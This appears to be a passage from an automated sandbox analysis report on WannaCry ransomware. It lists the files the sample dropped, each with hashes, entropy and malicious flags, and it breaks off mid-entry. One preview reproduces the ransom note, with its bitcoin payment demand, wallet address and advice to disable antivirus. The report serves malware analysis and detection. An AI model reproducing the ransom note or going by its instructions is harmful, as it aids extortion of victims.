                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):52120
                                                  Entropy (8bit):7.995400891648336
                                                  Encrypted:true
                                                  SSDEEP:768:LjFvp8L5WzZZ+oSSn2z0J3G/PhaIgu++mp+nOR7V6tyRBV736r+0clhmzrH034Ur:LjFRm5KydSnC0J3GJmM0EtgK+0cTO0nr
                                                  MD5:B29FE62550084DD5AD0B39BAA4780877
                                                  SHA1:555626E3213D9269FF11063BE061E597111F8646
                                                  SHA-256:8FB1303BB9570FBE3D7B6967FDAD5D93CF39670E999F79BFC3205194ED094232
                                                  SHA-512:CF6CE46EE6E6501730A39260661983C93A9F7AC0EE0040F1ED382800D3DA6C94322F3F1E27A138AA78D389085C4C711320F2A524004DA5AEE7DC82F771172CCD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):47576
                                                  Entropy (8bit):7.995573128949923
                                                  Encrypted:true
                                                  SSDEEP:768:nxSYRE9wQiDKzvwnIw9PXoAjpIUITVjsfcZdWuY849gtHePXeCBZGlsw7:nxSYRywQiD+gNYAKfFsfidWuY/EePuGC
                                                  MD5:7AE06D3A2A33129BE655F73DFE1EEE25
                                                  SHA1:FC308CB65908EC76565753C1F2CBBE8FD4C0D657
                                                  SHA-256:5DDB2D4CDC55877DF22C81133810CBE2B4EF5D20C0893E34BB98B8C1233B3DBF
                                                  SHA-512:D65C28EEDF6B886DC0DD742EAE979C0240B3057EBAF04A98C9D34CF8C22B5883C1BA3D08DB590CF5C51AD99280AD7BA22AE46C8145022C938AB209A4A45C4F5A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):34696
                                                  Entropy (8bit):7.994205797141632
                                                  Encrypted:true
                                                  SSDEEP:768:TXmhCQTbQD3pEVtX/USxQI2b5tX9iuRIqtqQXJIqDunl3vb2:VRD3pETX8SxQhFbJRIqtvZTDunl/b2
                                                  MD5:7396C7FF02CA01990B2589873A21588A
                                                  SHA1:50C6A9C42EEBF12C469DCD81F5F08A772917138C
                                                  SHA-256:DE3642807DE72A677E5F616A7ABB716285812C088049B72AC2D2FD08F960A247
                                                  SHA-512:F75FF13B0DA5901CEDCDF53751F8F9F63A014FBAD9C54D61458F1954A6A012F77E63F5EEFAD13A7B9F4659445E7A2744384388FE4FA1D2690E18705065B1D040
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3465368
                                                  Entropy (8bit):7.999943059525333
                                                  Encrypted:true
                                                  SSDEEP:98304:YIqOD1vIgttPdhU98VKLa1FXvH9hy3JBs5e2:c/mHvH9hys42
                                                  MD5:AA25078E1190434D4E1E2376B2749511
                                                  SHA1:7C71BD343887C131CD05C588A19A221632CE70AF
                                                  SHA-256:49718EC2C72D1C4F811F7A9946B46E5B5BA0EDE851CCA6C3FB1BBF79530B81CC
                                                  SHA-512:2A23FA29B1887909542CF1EA22AF14C3F87C085EFDCEC23E76FC9D3F61A0F9CA46DA424A5387914AB4238D302F6BE5F7AEF7CF74F2D939D9ED20388CDCC349CA
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19560
                                                  Entropy (8bit):7.991001275362301
                                                  Encrypted:true
                                                  SSDEEP:384:e69hiEqjcKQEheyI6LPd66T0o8YhBq0g0tIQJnbjAPd07CnL7:e6WvIKQerICN0o8sfJnb0l07CL7
                                                  MD5:B43ACA41DA09FE072400736413330204
                                                  SHA1:A370D62ED8429CA84F8E3E1AB86D248B22450AC4
                                                  SHA-256:47C641E62BA0BE508F54ECEC57574ACCA0F0F3D25F1B30874F3F5713B5E857DB
                                                  SHA-512:38294CDD2A618C233043A867B90E398AEE327C0D7A13D70784E152B41C738E77653C7F34A94891DAE4D627F7F314165C00989D074835ABECC72CAF658B3D002A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84259899688765
                                                  Encrypted:false
                                                  SSDEEP:24:bki0AYEPN+e6HPqsB9dKqA9rMT4G+ZX6lbynTEOGRVEZrP1HTmZx4qSxiIgNi8Mw:bkBE1WNBSb9gmibyniVEZr1Tm74tg48B
                                                  MD5:26E1773DF0D57A0D5329EBCF799C64BA
                                                  SHA1:54015B652E0EE556962EA23A7B75791785FAEDC6
                                                  SHA-256:10961514909239FB8A548700823AFCFD85D9E59F9425A06B45B5AE21BA9EE31D
                                                  SHA-512:DD206089AE7156D2277338409C4A02B6CA3CFE59F987BF936D2E3D78572DD8A379CA8E99022238E380C2A2EBEB432E8B2AD9089AF6BB29B85AD7BB60A8172191
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849946121833623
                                                  Encrypted:false
                                                  SSDEEP:24:bkbQ5orf5ek2Cp9fskheSIZDujBw4G6d9hrZ1ykxcoJsY8au4S5PlwZLWf5TqK3y:bkU5ick99fsklIZKju4xp7BJdSllwMVI
                                                  MD5:9AEC771663FABE166A37488531D90238
                                                  SHA1:0D8ACB53B23D4EE4E652562A71B778215922BF42
                                                  SHA-256:13760FFDB4E67356D2632F618FCDD6B7795F3584FC3430C245AABE0CFDC0CD94
                                                  SHA-512:90A040D377EA7983CB3B431389805FA283DFDE6C1CACE756FC6D41C353CF07C0517FC1877E450013330DC79BB9D40405A756721206EF6275B76D00371750556E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860896880517714
                                                  Encrypted:false
                                                  SSDEEP:24:bkN3n3zjWVj+AtfRfhtUFjBBRBl+PAO/qrjTAn8uOmFiVPof5n:bkhnWEAttht81+d8f4vORiB
                                                  MD5:23F4EE5EB0D36FF8F48090D6DC5EB616
                                                  SHA1:2B01EAA57CB1D913B6D46E5E4A43032981DAF997
                                                  SHA-256:A41DF67A2D3E4D7B5EB05EC38B5FB98AB6DDB1F8CE5E073324A45A818CDF389B
                                                  SHA-512:3B67C7BD8BBD7493287D4F9FCFD4EBA3485EA969948AEDC782F236B2F50395AB398B87B7EEDD45D01F68EBC84F395839D01051968639B78AD13DC108FE24464C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.829347230978042
                                                  Encrypted:false
                                                  SSDEEP:24:bkicUDYnRFVR0V2MYt9NYGv1+e7KT9CIQUFoKp6wjFQuyRuXH:bkiV4vWAMYnNd+eU6U6O6qLXH
                                                  MD5:FC0BD4C904E73F1190969646CC27922D
                                                  SHA1:485B96E303525DE91637D83438667C7F5EE3011D
                                                  SHA-256:205168E635F759BDE8E388A25679729CFA5133AD75747B4B09302E365AED4D3A
                                                  SHA-512:34A226EEDD6CD87B927C6EBA0C99C5595B04F4AC9C46D765947063AAC0C1C4D7D8480B5B6FB9E62DD9099090CA25AEE938296B84FEB79CFA24AA900926F3B5C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8331263339910535
                                                  Encrypted:false
                                                  SSDEEP:24:bkZN8yWxycHIESvdZuyuC+Wk2myu4xH/wVNd8qn/6jmpFi/X0vzoMOlfuPY72:bkZ8ycH2K94qyu+fO8q/CmrQ0vkMaGwq
                                                  MD5:713664DD4B267CF13123C279B171CF7E
                                                  SHA1:A2A07097E0129824226682BEAA3BE907A0B1971A
                                                  SHA-256:C7A05E07840C80C7E782A5FF2196C4E922CB8159AD91E059DCA0D302FD1DBD2D
                                                  SHA-512:8B9501C4179D9E49DAAC850975A707753D0DE4D4E777975DE6E005BFA205A98630C93584DCC91134EBF424C3AD32A9D90052D7BF3F9CCB238B31FA3B663B4BA9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857904470184713
                                                  Encrypted:false
                                                  SSDEEP:24:bkXn7xZ0Ad7xV1jkKawlR5cj4Pc3b+IwynbiJwugWJIWeLvVAKL8f1:bk37xWEV1le4Pc+WbvrsqrVjLo1
                                                  MD5:01458964CEF4986DEBF42AF943035EB8
                                                  SHA1:87F76042C2EC1DB94F0F1CB4A096777EFCFA32E8
                                                  SHA-256:E24CE91EC3B691E2769C9DF97B7FC2608C03934FDA5CFE000CCC7CD18F39B728
                                                  SHA-512:6637DDDFF48AB09002C4B641041143EE2002D0C962930E66A1D7BD1915B5A131A5F4FFA9AAA1CEC0FC0E8F466C8C56585B6D9387874493716D4EDBB43F33CB25
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.876329322149963
                                                  Encrypted:false
                                                  SSDEEP:24:bkkIbQ8k1oICwZeLo0/YxqrAWB2M5nB3ZVtMlEgMfioTLvTO0zBoaV3Ckfkt5mur:bkH2KICwiolQAWB2M5BJVYmfiWO0zBo3
                                                  MD5:C18D3E4282D1EAE5099745210978B5F0
                                                  SHA1:C3FBE7556D9EBCB202A71C180FBEDB4862E970A5
                                                  SHA-256:51AD103B5AE50549F4C8E810D64FFAE70048144530628B8EF7DC86F34C8C5F16
                                                  SHA-512:4D2A0DF1D0C116DF28414DC25DE1444B49241FC1C6F130DDDB1250512608364B58C748C5CCF877490DE0E5A001A5897931324DD56CFC6E128FBC52D8C0E91A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8490804436733015
                                                  Encrypted:false
                                                  SSDEEP:24:bkijrdPDW6uS3J6NUxdYn42kz1syIZAWMYSxfw/w9gWCcrR56GQ2vbeFuQxMdT1F:bkEJ7W6uS3JfvS4n1vsADYSpwI9gWCoz
                                                  MD5:0912848A8EC8E4FCFE23EC0A39A39076
                                                  SHA1:D26D4EF538CA5D418BCB085C79F5DA2B7C122F1E
                                                  SHA-256:4F5FF33C191D2399D77D0F11F314F83E28230A51A143C37A566F1C1E1F3C67DF
                                                  SHA-512:F353CE89AA50A9CF23FC55D81F13277201D3562AE39FC1E968B95FFBA0406EE6850C020B245B068F9E30F9412135A08D04F9FC11F9C01EFECDA6B74BD4807DC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833933403557597
                                                  Encrypted:false
                                                  SSDEEP:24:bkFIMVk4uyJw8PFqwNzCQkfN2POUuDhSVadgLCjII7PXuXZHN0jZGQ/RF:bkFIqk4DL9qwPzPOhhSUd1IIDXu7Mx
                                                  MD5:5F1CDF029ED0D7EF9B00362641F078CD
                                                  SHA1:996C243299659FBBBA80EE85FEDD3DBECEB1223A
                                                  SHA-256:ED0529FD9DC8C0CD489038D42F8F174ADBDACB000DBA6BD4C16FCC016FFF125C
                                                  SHA-512:772AF2D08C1676EFE93736ADAD5FF84E5376B4073539D1EC3BD06EEE652251124F154CDC82A6A1FE69FDA5919C9A0F1E9AE26FFCFBC1B75711F47DBCC7FC4A54
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837042601367274
                                                  Encrypted:false
                                                  SSDEEP:24:bk6nd1wWuhKGg7TLghpGdDImfsUHpGa5Ib8Gsg49W4T:bk6nEWuwypGdDIL4GoIYGs5nT
                                                  MD5:14F05F7944A6FFD3594BE3A6BAF30827
                                                  SHA1:68428DEEC4789D0BE3754CA5B9460AA0D57FFF98
                                                  SHA-256:D3EF71F16796BAC56AA733571CBC381FDB8029D315F55DE2201E7D8C1D44C1F6
                                                  SHA-512:EA6986D4743D93E58DB3E64DA1EFBB3B065BDF3B65196EAD23F337B36791D97840832542487B3FBCFB553977B835063B60D10924AB16E73B455CFE7131948E1D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84403982408391
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPO434FHXO9ucxngY+oNI6t5pT1hbM3L9jeN2fE/mZGh/BAfBLTwa9:bkhPO4GXOccxgHoFx1hob953kh/B20O
                                                  MD5:6D170AC6673840205D713A35FB6EABE1
                                                  SHA1:9DC6E03C127224084797D532AD28EA1FD4E82757
                                                  SHA-256:1CB535883E423103E9F271F7EF3488737E5FC9BC6FF8383E1385C7E202D9BF83
                                                  SHA-512:F88E665DEAB899B348E3F4699623F44F9FC0D47DE2E8339C4FC2FF539BD0E9FA1E4FDC3E90CA30F8C4B3457457F7C02F1204AA93244208F3B009F4AE8EDF6910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83031464283867
                                                  Encrypted:false
                                                  SSDEEP:24:bkS3Ir8eZZihIE4+Us4E0qCz4nzHxtW0XJZ6YMzH4MVyDA34LWhJm4l+7sUMkbCN:bkqPPA4nzHx/D6hzH4O25LAJvl+7sUMx
                                                  MD5:EE06AD80636DC54FA88F36B008391FEA
                                                  SHA1:5AF4D0862BD485C720B9B33B0F71E9E9D98858F3
                                                  SHA-256:BCC0476D3FC829A308BD148E1E752CEEA33A9F63D1FCA16FF4ECBFB3C41B783D
                                                  SHA-512:6913FCBCD8B10A4FA213B1342542B37BF46280DBDA7E9611D20410173B076D88F703A5D14A20D7662628D3C722F44A378923F12C7364CBC241533D473E787971
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848796345452971
                                                  Encrypted:false
                                                  SSDEEP:24:bkGNZsTY6/8HQDoi/gVzpfy6jar9PyvCRYwfpGkKCPjSbtl6oaU5B9F12EGUriT:bkGfsf82gVzNYPyqJfoaPsaYOnP
                                                  MD5:C60E19F38602554FB58E3A0F7F737DFD
                                                  SHA1:ACB275B4EAAA2DBDF74D9AEFE4DDE63EE9D9FDBF
                                                  SHA-256:1917306234433A3C80750C54B4305D3E17209F8FD53681CF24915B19DE515BFB
                                                  SHA-512:628938EE661A72915EC49B382DF85F734BE5B707CA79B6D83795B1B5F6711242ACD0B9A6C332A1CCBF6C577D86E29FF51F2D40A4AADC8DBE2D9311BBE20D409C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833576816139003
                                                  Encrypted:false
                                                  SSDEEP:24:bkBAZab/Tp6kg/jZNOykuYLGmbmrr2g2Cj/UoaJKs2M/KT4F:bkF/FW/jZNiuJmbmrhrUPh2s82
                                                  MD5:0B55E0FB4D2027256A4F179C5D8079D1
                                                  SHA1:FAB31C04564A32B55AE99EA440641EB0ABF5288C
                                                  SHA-256:6E74F4907C9B894FE24E19864565DA144BA953C45D9450AEFB7918CDDA259C5A
                                                  SHA-512:3A08CF10616B38E7D27CA5830FD2C768271C76105BB3FAA8C0DC187A9BC136E566FCFFDB5AEB44BBEFF67A6F9C5EBB59B3F2DE31D0A86C9763D7C266493633A7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.872777853650534
                                                  Encrypted:false
                                                  SSDEEP:24:bk++Cr/L0XbZiKRRG6cux5/SNJUQZ+K5jkgTeOvuSzKvpF2vypJ934Pthwv:bkE/YXbbHGjY2SK5ogTYDj2eJ934Fmv
                                                  MD5:7152C96B696C458BB8CC07C4C139DA7E
                                                  SHA1:B9C9B1B3DA050259CB03670D4DC414C4FE881AC6
                                                  SHA-256:B03574312B8506121FB559636B5EFE09A9B64B08E570D236A16E4EE6422E84F8
                                                  SHA-512:D1E7A8994FB84B84E259BC98C465CC19B565364D958CB5DCA209B0A1EA6C98D5231E447FDBC8ADA9C4F7243D3E005D4492501CA4F0C2BC39E26C3B2ADA5DA555
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.821457853377928
                                                  Encrypted:false
                                                  SSDEEP:24:bkCme80jEghn98/44cdCm+CD0YKzOHuhn0oZsGg9I1zPpJLw8kzijuz:bkCK0Jhu/44cdOCD07+uhnG8pJLjkziA
                                                  MD5:B2B6A9DC3E1BBFE28E9CCD286204149D
                                                  SHA1:D457BCC0CD9192CDE7B82F923970C13FA38797EB
                                                  SHA-256:CDB36855E81240C6E5121FCCA828C879BCF15994A658D17167D64DBB68D33101
                                                  SHA-512:4D96B22BB81180395A732B5A6E293677188B3EB1C1D191D07B1BD7C3ECF10A558BEBDCD13EACCD486035EB7DF25033739F74340F9D1EA9D3B7F703A1E547A2BE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.845346345377583
                                                  Encrypted:false
                                                  SSDEEP:24:bk9bnzjfYHiuheh6SQDTu14ea39vbZk9Y5dhs46MkasJzghCDkNQL6qgqJMT6pPI:bkx8iCehaP3eWvV0YVs592iRLBzJM91h
                                                  MD5:8A2B2DF71862270A3DDA218F861309C0
                                                  SHA1:D92E7416D8B15512D0D2EE06A53F70E547C579FE
                                                  SHA-256:9F0694B5BABBBBB0BB1DE10C633540B6FFC36950D8BDF46D6BC062534D7498BB
                                                  SHA-512:0DD4F52924EF57D7F09CAF325F507CFDCCCE55CAA70062E6762A0FC5AC427B2B513328F1B7D2412E23D9AA671A13B8E1EDD32A1E86F5945A9BACFEFACF69C5AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.865382498226164
                                                  Encrypted:false
                                                  SSDEEP:24:bkyKcI4qXK7xnDgq8ChLnnGtGYOV8YELcMHl1S9K8nPu2k8eiATviHKTc1v8VFpB:bkyKcIvXKNnDgq3LGYV8HcMFMI2wmHIf
                                                  MD5:B9573DB2AC298F4D1514D6B840D29590
                                                  SHA1:49401520D85A142BD6111F52B086F43DCDCD45D4
                                                  SHA-256:46D112C2CFD38AD2A05767087896DE6128EC57705D33ECE7AD9FD4D279EC980D
                                                  SHA-512:2B7B39D692F402348E85B86D549DC8B0DE351B3D29DED455737F69C4135F35D65AD5D931A2322124D3233BF74165B03FF4C9FF7CEA8C878D4CB8D658BF72F439
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823861494408535
                                                  Encrypted:false
                                                  SSDEEP:24:bkY84SY4oOchCC2Kq4U3fq1ithBP+UAYCQn1fHfVkSXIlAbA8+qv9KJ7SJix:bkNY4Dch9mByGTP+UA5QfkSqA5z9KJ+w
                                                  MD5:26F1655C95582D20A29121A663F9DB58
                                                  SHA1:797EAD6DAC74C60A8BD204ACD6D537389D932E5B
                                                  SHA-256:2F30EAFC4B411F3939DD860A126C140ABB27568A7B24BB8EA20441404D52D742
                                                  SHA-512:05E9199D2A0FC7187A046CA6A0DABAFD2C8F91FEAEEA0D54E96BD2DA7592C4D70D0D71CF8E0122A5D586D88A36213FB84E14122715F3C592E9C6C20FD9AA509B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854876666404128
                                                  Encrypted:false
                                                  SSDEEP:24:bkym+lkJ9UrwHM0YW99j2XPEmDDb7195S1su6N0haX2obkIiMlMUR:bkz+yzEaM2DasaD/PgCu1hq4RuXR
                                                  MD5:8DA76DECA4032F605A39501B56A97777
                                                  SHA1:4E4461AE4BE7DFF6DA9FB719A97DA45712EF31B1
                                                  SHA-256:8275DCA0C2128624FB855C528B4BF70783EE82BBE1F85001316DD4B5569538D2
                                                  SHA-512:67BBB62E522583A5F6B0DF708359FA27CBBA8608F98E85E7EA7BECB640CC0F10A22E050EC3C58A4208C8E8AE90C0F5303D1BF3FDB9B8EB5970F5828573E44AAF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.831882631044693
                                                  Encrypted:false
                                                  SSDEEP:24:bkY5XxgiD6Ncz+RzkOwTmYES/f8qsjWS3+/JhTote/HhRx64ES3wc+:bkBgIczAkOwynYfnslVte/hRx6ZSQ
                                                  MD5:26D459BA1EE3B9220F4D9632C21793FE
                                                  SHA1:E0465BB3BD6C673E572B8F5C7F1D928B118683DD
                                                  SHA-256:A478958C566E764EFBE6501481A4E82CBAA339F2780312A1F42E5DE747704319
                                                  SHA-512:7E688294CE6E829CBBC7F28DC14FEB56675417C62F7820779F09909FBECD3F919339408DE26B61E8F17489AE659DFE8C13294EF6C40438DD2B3ADC4ECE293B8C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.860328561517608
                                                  Encrypted:false
                                                  SSDEEP:24:bkb2MhDvcXJ6hTckfIOV9h+oLPMyENGwgwfG2rEm4KDZttVLqZAMe12S7:bkbDhDEXJ2ckfZRLPuGpKrEm4MZYZ+2o
                                                  MD5:6F702964BA64BBBA60C5AA43F5D22AD5
                                                  SHA1:8AE79AF3E61F42967C0B0E7D629BC024BF9EADEC
                                                  SHA-256:F2E061DF1B07A1CAF284C08D86DD8F36F4795021E493AF1161DD60EC2C0724F9
                                                  SHA-512:DCE198D45F91C1AA60A9C7FC142AFE45F624F288B01AC679EACE1C77EE42E97E7743AA4626B8903AA919FCF9AEF62403856D55C722E0A68AA81B949460485022
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861835322984556
                                                  Encrypted:false
                                                  SSDEEP:24:bkEsKPlDjhCP5sImASdZ+JnptlYwCO24ITUM9/IRF4gI4xJ0ICpxdQYanyvZWaw6:bkEXtnPImAgYbtl2L4IoM9/KF4gI4xJi
                                                  MD5:D7E8D50021019949C55044C0E0E0C8BF
                                                  SHA1:8FD4CF8C1107039791B825BF434B0610A2282B69
                                                  SHA-256:FA14F8519FC7FBE1C5D574DE356D9119F082781143CBF9CA3E9D3FE8A3FD6175
                                                  SHA-512:A730EEBC06CDE8E443DED0562754C6C183A7E4DD2998FB2D30DC0A00C36521AC2D28E6E33CEC995AD0EFF72E3EDB5A735ED178165E4DC2452D4B1B4C11B8C844
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839722427521709
                                                  Encrypted:false
                                                  SSDEEP:24:bkjzvoE+Bfk3j3hJ1Ak2z+kUZvl0LVe6+w/ft6iNso5zNas:bkjzJ+lsj3hJik2rUZvlMVeO9bso5gs
                                                  MD5:34606F3A41D318DDACF5FAA774E2751F
                                                  SHA1:07E216DCF0829C46B774000D18DB5404CAD51DCF
                                                  SHA-256:AC8CECD1448AC554304A566AFEE89DAF5A2B5EF0A8123F1776A349C54F7B0CD0
                                                  SHA-512:D580836BD02C8E11BFA05720169D64B7EDD6CD2C998612D503BB59C6BB59F42CEC4B49086351949F2774CA64E6E21A4FEA6377A190CEFA3BF925EB41265EBC3E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.836745480204268
                                                  Encrypted:false
                                                  SSDEEP:24:bkdMD2eJbuOlWLNDeHihRbG2JGs6jJUWXuKcR3CbtwKpikg5BLk3:bkdMDHNCgihRbIj7XuKcyTETk3
                                                  MD5:10A0B5DE9E7ADC664B06FF879D26EDE1
                                                  SHA1:02E8D8DA942A094D5E94CC65E717D7EBA49A7DF6
                                                  SHA-256:DDF8BA1D5A7E0A8A1B963098E908E7EA07F0943096F4928312AA8E14741D2B26
                                                  SHA-512:E4114B3A3B42B42637933FE4C81F48560D64FA9022BA66248C204A547E9D41D9E9CF5866A9A07A66B5757FCB6F8470151B0B906AEE9A97528FDD388E398AA749
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85947636127693
                                                  Encrypted:false
